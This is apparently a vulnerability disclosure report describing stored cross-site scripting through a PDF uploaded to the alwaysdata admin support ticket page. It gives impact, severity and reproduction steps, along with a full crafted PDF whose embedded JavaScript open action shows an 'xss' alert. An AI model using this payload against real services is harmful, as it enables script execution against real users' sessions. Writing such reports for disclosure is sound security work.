Task Description
Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
Severity-High
Steps to reproduce- 1) go to support https://admin.alwaysdata.com/support/
2) Open new ticket
3) upload this code as a.pdf (%PDF-1.3
%���� 1 0 obj «/Pages 2 0 R /Type /Catalog» endobj 2 0 obj «/Count 1 /Kids [3 0 R] /Type /Pages» endobj 3 0 obj «/AA
<</O
<</JS
(
try {
app.alert\("xss"\)
} catch \(e\) {
app.alert\(e.message\);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj 4 0 obj «/Length 21» stream BT /F1 24 Tf ET
endstream endobj xref 0 5 0000000000 65535 f 0000000015 00000 n 0000000062 00000 n 0000000117 00000 n 0000000424 00000 n trailer
«/Root 1 0 R /Size 5» startxref 493 %%EOF)
4) upload this file 5)Open this ticket 6) click on ulpaded malicious pdf file it will refelct
|